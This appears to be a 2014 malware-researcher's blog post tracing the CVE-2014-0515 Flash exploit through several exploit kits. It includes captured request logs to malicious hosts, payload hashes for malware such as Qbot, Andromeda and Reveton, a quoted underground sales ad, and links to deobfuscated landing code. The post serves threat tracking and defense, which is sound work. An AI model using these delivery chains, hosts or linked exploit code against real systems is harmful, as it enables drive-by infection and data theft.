Discovered by Kaspersky in April in watering hole attack, soon after used in operation targeting Banking information in Japan/Korea by Symantec, reached Exploit DB at begining of may, then in malwertising tied to Brazil 2014 by Spiderlabs, the code targeting CVE-2014-0515 (Flash 13.0.0.182 and earlier) has find its way to Exploit Kits. I spotted it the 2014-06-05 in CottonCastle (blog post coming) exploit kit. Brad spotted it in Flash EK.
CottonCastle EK:
CVE-2014-0515 exploit in CottonCastle 2014-06-05 |
Flash EK: 2014-06-06 (decided to use coder's name)
The Flash EK coder announced the new exploit on underground the 2014-06-05.
"Добавлены новые сплоиты. Существенно поднялся пробив. С нашими впс и доменами - 350 уев в неделю. С вашими - 250. Битки или чек паймер. По английски не понимаю. Траф из СНГ не принимаем."
google translated as:
"Added new sploitov. Risen significantly breaking. With our EPS and domains - uev 350 per week. With your - 250. Chock or check paymer. By not understand English. Cores from the CIS do not accept."
Breaking increased by up to 45% of it's pre-CVE-2014-0515 value.
CVE-2014-0515 as spotted by Brad in Flash EK 2014-06-06 |
200 OK (text/html)
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/js/pd.php?id=6376652d323031342d303531352e636f6d (6376652d323031342d303531352e636f6d is the referer in hex)
200 OK (text/html) http://pastebin.com/HdVf799r
Flash part of the JS detect in Flash EK 2014-06-06 |
POST http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/json.php
200 OK (text/html) http://pastebin.com/uhTTybKH
Post data to json |
jspon.php Flash EK 2014-06-06 |
And after one more hex2text : http://pastebin.com/0F9Z2tiW
json.php after multiple hex2bin Flash EK 2014-06-06 |
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/msie.php
200 OK (text/html)
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash2014.php
200 OK (text/html) http://pastebin.com/mqXeun1g
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash0515.php
200 OK (text/html) http://pastebin.com/L6NYY0iW
After some deobfuscation (unescape, hex2text) : http://pastebin.com/TjMyS6YW
After one more hex2text : http://pastebin.com/SVGS4yhD
After 3 hex2text : 0515php in Flash EK 2014-06-06 |
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash) c49057333ebe34638e7908b43bd23f6c
CVE-2014-0515 DoSWF protected. (won't try to go further) |
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash)
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/loadfla0515.php?id=4
200 OK (application/octet-stream) bde9e91d8a9e19a45c9ebd44393c0194 Glupteba (Thanks Marc-Étienne Léveillé from Eset for identification. MS flagging it as Carberp made me wonder)
Files : 2014-06-06_CVE-2014-0515.zip
You'll find Pcap and additional Data on MalwareTrafficAnalysis
Sweet Orange :
Spotted by Brad on the 12th
CVE-2014-0515 successful pass in Sweet Orange |
200 OK (text/html)
GET http://img.blueprint-legal .com:16122/systems/mysql/hxwXHAp
200 OK (application/x-shockwave-flash) 25844d337d3ee13ec411100cb2d2baf1
CVE-2014-0515 in Sweet Orange |
GET http://img.lawandmarket .org:16122/cars.php?play=268
200 OK (application/octet-stream) d35d337ff7598bd6dc20c24e3be735bc (Qbot as usual for this user)
Files :Fiddler/Payload/Flash
Nuclear Pack:
2014-06-15
Exploit is inside (for instance : 444d411a353f6bd8209f91555dfd713b ) .
2014-06-18
After multiple try without being infected by this exploit on Flash 13.0.0.182 I finally got a "successful" pass. (Thanks Will Metcalf for Referer)
CVE-2014-0515 positive pass in Nuclear Pack |
GET http://f42cb2bfvhf.venueat.gcwsa .org/
200 OK (text/html)
GET http://737570439-1.venueat.gcwsa .org/1403061420.htm
200 OK (text/html)
GET http://737570439-1.venueat.gcwsa .org/1403061420.swf
200 OK (application/x-shockwave-flash) f95006970f34a6ca5bcd0b32b92dd48d
GET http://737570439-1.venueat.gcwsa .org/f/1403061420/7
200 OK (application/octet-stream) aa73557aa6b01045afe1b8b6a4aa0934 (Andromeda v09 rc4: 073e329fc4caff518ffb207eb3ac5859 - calling testotds.mcdir .ru - 91.194.254.180 )
Files : Fiddler/Payload/Flash
Angler EK:
2014-07-03
Modification spotted by EKWatcher. Exploit Identification by Kaspersky.
CVE-2014-0515 successful path in Angler EK 2014-07-03 |
200 OK (text/html) Landing (Pastebin)
Contains some AV (Kaspersky and TrendMicro) detection :
AV detection ( Function0 http://pastebin.com/hjH8ijuA ) |
SilverLight /Flash trigger
Moditication spotted by EKWatcher ( Function1 : http://pastebin.com/H2DdDeVf ) |
And impossible path :
Impossible Path ( Function1 : http://pastebin.com/H2DdDeVf ) |
[OT] Silverlight Calls : Function2 http://pastebin.com/Vd869rDX [/OT]
Flash Call (function3)
Flash Calls Function3 http://pastebin.com/maY5Wz1X |
GET http://reenslavementbuchungsbuero.izyday .com:5900/9C52KmONbd2yuWAu5h6nA_qVLxrslXn927DBuIPEo2Pog7IUkVQt04rmOPmow_rb
200 OK (application/x-shockwave-flash) 85db431821dfec5d5d404b839c98d333
After decryption (Kaspersky's work)
Piece of CVE-2014-0515 in decrypted flash from Angler EK |
GET http://reenslavementbuchungsbuero.izyday .com:5900/sVUXbUAgdGMB6xjbl128LfXoLjZ37iyD34sGV24h7-9RKadZHRBKohwCwk5FHCfc
200 OK (application/octet-stream) (Reveton Ransomware)
Files : Fiddler/Flash
Styx : 2014-08-22
Update coming shortly.
Read more :
CVE-2014-0515 exploit from FlashPack EK - Brad - Malware-Traffic-Analysis
CVE-2014-0515 Goes to Brazil for World Cup 2014 - Arseny Levin - SpiderLabs - 2014-06-03Recent Exploit for Adobe Flash Vulnerability Targeting Users in Japan for Financial Information - Joji Hamada - Symantec - 2014-05-30
Technical Analysis of CVE-2014-0515 Adobe Flash Player Exploit - Matt_Oh - HP - 2014-05-23
Adobe Flash Player Shader Buffer Overflow Exploit - ExploitDB - 2014-05-09
New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks - Vyacheslav Zakorzhevsky - Kaspersky - 2014-04-28
New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks - Vyacheslav Zakorzhevsky - Kaspersky - 2014-04-28